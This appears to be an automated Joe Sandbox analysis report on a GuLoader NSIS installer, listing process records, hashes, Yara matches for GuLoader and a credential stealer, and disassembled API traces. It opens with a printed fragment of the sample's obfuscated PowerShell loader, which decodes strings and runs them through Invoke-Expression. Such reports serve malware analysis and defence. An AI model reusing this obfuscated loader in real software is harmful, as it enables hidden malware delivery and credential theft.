N3BlCAr4FoD H8LlDBl3ErCLa5RiDMaABoDKe9 BDThDHeDBo3TiC F4SkD GFcaD s8prD Q1HiDLu3 RC P4ArDPr8AnDCa3 S8Ch5Co8 I3As9noASp8Bl6Ti9BuAOk8Lo6Bl9DaFDi'Ar;Ga&Ta(As`$StG Su OdKoeSusHu7 R)Be Ba`$HeQMauVeeGrrGrcBoiInmKae LrCuiRutExrUfiUnnFo3Fa# A;""";function Quercimeritrin8 ($allerunderdanigste,$Sjllndernes) {&$Kikkerternes0 (Quercimeritrin9 'En$abaLilDul leRar GuTwnabdTaeBprMudChaFunPri HgBesKat Cefr Es-TtbInxCho UrRi De$ TSOvjGil LlFlnlodMye Dr FnBeeBrsNi ');}function Quercimeritrin7($Smadderkasses) {return $Smadderkasses.Length;}Function Quercimeritrin9 ([String]$Tachygenesis) { $Merice = Quercimeritrin7 $Tachygenesis; For($Jimcrack=2; $Jimcrack -lt $Merice-1; $Jimcrack+=(2+1)){ $Baseness = $Baseness + $Tachygenesis.Substring($Jimcrack, 1); } $Baseness;}$Kikkerternes0 = Quercimeritrin9 'PaI PEFuXEu ';$Kikkerternes1= Quercimeritrin9 $Unhappiness;&$Kikkerternes0 $Kikkerternes1;<#articles Beslutningers Slettelandes #>;
Imagebase:	0xe30000
File size:	430'592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.447870712.000000000B40F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:30:36
Start date:	07/09/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase:	0x260000
File size:	107'704 bytes
MD5 hash:	8AD6D0D81FEC2856B8DCABEE8D678F61
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.738241406.0000000020D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:31:19
Start date:	07/09/2023
Path:	C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Myapp\Myapp.exe"
Imagebase:	0xc30000
File size:	107'704 bytes
MD5 hash:	8AD6D0D81FEC2856B8DCABEE8D678F61
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:31:19
Start date:	07/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff751820000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:31:27
Start date:	07/09/2023
Path:	C:\Users\user\AppData\Roaming\Myapp\Myapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Myapp\Myapp.exe"
Imagebase:	0x660000
File size:	107'704 bytes
MD5 hash:	8AD6D0D81FEC2856B8DCABEE8D678F61
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:31:27
Start date:	07/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff751820000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.7%
Total number of Nodes:	1314
Total number of Limit Nodes:	24

Executed Functions

Function 00403348 Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040336D
GetVersion.KERNEL32 ref: 00403373
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
OleInitialize.OLE32(00000000), ref: 004033E9
SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
GetCommandLineA.KERNEL32(Arbejdsdatabasens Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\demand_rpkb_060923.exe",00000020,"C:\Users\user\Desktop\demand_rpkb_060923.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 0040390A: lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000000,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,1033,Arbejdsdatabasens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Arbejdsdatabasens Setup: Installing,00000000,00000002,745CFA90), ref: 004039FA
Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000000,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,1033,Arbejdsdatabasens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Arbejdsdatabasens Setup: Installing,00000000), ref: 00403A0D
Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam), ref: 00403A18
Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E

ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662

Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
ExitProcess.KERNEL32 ref: 00403688
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
ExitProcess.KERNEL32 ref: 0040382A

Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403548, 0040354D, 00403563, 0040356F, 0040357E, 0040358B, 00403597, 0040359F, 00403698, 004036A9, 004036B4, 004036C0, 004036CD, 004036DC, 0040378B
~nsu, xrefs: 00403693
C:\Users\user\Desktop, xrefs: 004036BA, 004036BF, 004036EB
NSIS Error, xrefs: 0040340B
C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00403644
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 00403420, 00403426, 004035DD
TMP, xrefs: 004035A0
Low, xrefs: 00403586
Arbejdsdatabasens Setup, xrefs: 00403410
C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00403538, 00403639, 004036E3, 004036EC
", xrefs: 0040347B
\Temp, xrefs: 0040356A
SeShutdownPrivilege, xrefs: 004037BE
UXTHEME, xrefs: 0040339A, 0040339F, 004033A5
1033, xrefs: 004035B4
Error launching installer, xrefs: 0040361F
C:\Users\user\Desktop\demand_rpkb_060923.exe, xrefs: 00403745
.tmp, xrefs: 004036AF
TEMP, xrefs: 00403598

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\demand_rpkb_060923.exe"$.tmp$1033$Arbejdsdatabasens Setup$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6$C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6$C:\Users\user\Desktop$C:\Users\user\Desktop\demand_rpkb_060923.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 562314493-2077274770
Opcode ID: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
Opcode Fuzzy Hash: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040535C Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32 ref: 004053BB
GetDlgItem.USER32 ref: 004053CA
GetClientRect.USER32 ref: 00405407
GetSystemMetrics.USER32 ref: 0040540E
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
ShowWindow.USER32(?,00000008), ref: 004054AA
GetDlgItem.USER32 ref: 004054CB
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
GetDlgItem.USER32 ref: 004053D9

Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE

GetDlgItem.USER32 ref: 0040551C
CreateThread.KERNELBASE ref: 0040552A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405531
ShowWindow.USER32(00000000), ref: 00405554
ShowWindow.USER32(?,00000008), ref: 0040555B
ShowWindow.USER32(00000008), ref: 004055A1
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
CreatePopupMenu.USER32 ref: 004055E6
AppendMenuA.USER32 ref: 004055FB
GetWindowRect.USER32 ref: 0040561B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
OpenClipboard.USER32(00000000), ref: 00405680
EmptyClipboard.USER32 ref: 00405686
GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
GlobalLock.KERNEL32 ref: 00405699
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
GlobalUnlock.KERNEL32(00000000), ref: 004056C6
SetClipboardData.USER32 ref: 004056D1
CloseClipboard.USER32 ref: 004056D7

Strings

Arbejdsdatabasens Setup: Installing, xrefs: 0040564C

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Arbejdsdatabasens Setup: Installing
API String ID: 4154960007-261780675
Opcode ID: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
Opcode Fuzzy Hash: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(745CFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,745CFA90,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00406476
FindClose.KERNEL32(00000000), ref: 00406482

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA7 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
ShowWindow.USER32(?), ref: 00403D00
DestroyWindow.USER32 ref: 00403D14
SetWindowLongA.USER32 ref: 00403D30
GetDlgItem.USER32 ref: 00403D51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
IsWindowEnabled.USER32(00000000), ref: 00403D6C
GetDlgItem.USER32 ref: 00403E1A
GetDlgItem.USER32 ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
GetDlgItem.USER32 ref: 00403F35
ShowWindow.USER32(00000000,?), ref: 00403F56
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F68
EnableWindow.USER32(?,?), ref: 00403F83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
EnableMenuItem.USER32 ref: 00403FA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
lstrlenA.KERNEL32(Arbejdsdatabasens Setup: Installing,?,Arbejdsdatabasens Setup: Installing,00000000), ref: 00403FF5
SetWindowTextA.USER32(?,Arbejdsdatabasens Setup: Installing), ref: 00404004
ShowWindow.USER32(?,0000000A), ref: 00404138

Strings

Arbejdsdatabasens Setup: Installing, xrefs: 00403FE5, 00403FEB, 00403FF4, 00404002

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID: Arbejdsdatabasens Setup: Installing
API String ID: 3906175533-261780675
Opcode ID: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
Opcode Fuzzy Hash: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040390A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

lstrcatA.KERNEL32(1033,Arbejdsdatabasens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Arbejdsdatabasens Setup: Installing,00000000,00000002,745CFA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\demand_rpkb_060923.exe",00000000), ref: 00403985
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000000,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,1033,Arbejdsdatabasens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Arbejdsdatabasens Setup: Installing,00000000,00000002,745CFA90), ref: 004039FA
lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,00000000,C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6,1033,Arbejdsdatabasens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Arbejdsdatabasens Setup: Installing,00000000), ref: 00403A0D
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam), ref: 00403A18
LoadImageA.USER32 ref: 00403A61

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

RegisterClassA.USER32 ref: 00403A9E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
CreateWindowExA.USER32 ref: 00403AEB
ShowWindow.USER32(00000005,00000000), ref: 00403B21
GetClassInfoA.USER32 ref: 00403B4D
GetClassInfoA.USER32 ref: 00403B5A
RegisterClassA.USER32 ref: 00403B63
DialogBoxParamA.USER32 ref: 00403B82

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040390F
RichEdit, xrefs: 00403B54
RichEd32, xrefs: 00403B35
_Nb, xrefs: 00403A7D, 00403AE5
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 0040390E
Control Panel\Desktop\ResourceLocale, xrefs: 0040393E
RichEd20, xrefs: 00403B27
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 004039C8, 004039D0, 004039DD, 00403A27, 00403A2D
C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6, xrefs: 00403994, 0040399C, 00403A34, 00403A3A, 00403A4A
.DEFAULT\Control Panel\International, xrefs: 00403970
RichEdit20A, xrefs: 00403B45, 00403B4B
Arbejdsdatabasens Setup: Installing, xrefs: 00403936, 0040393C, 00403961, 0040396A, 0040397F
1033, xrefs: 0040392A, 00403980
.exe, xrefs: 00403A07

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\demand_rpkb_060923.exe"$.DEFAULT\Control Panel\International$.exe$1033$Arbejdsdatabasens Setup: Installing$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3785819665
Opcode ID: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
Opcode Fuzzy Hash: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\demand_rpkb_060923.exe,00000400), ref: 00402ECE

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\demand_rpkb_060923.exe,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050

Strings

@TA, xrefs: 00402F2F
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EA8
Inst, xrefs: 00402F86
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
soft, xrefs: 00402F8F
"C:\Users\user\Desktop\demand_rpkb_060923.exe", xrefs: 00402EA1
Null, xrefs: 00402F98
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
Error launching installer, xrefs: 00402EF1
C:\Users\user\Desktop\demand_rpkb_060923.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
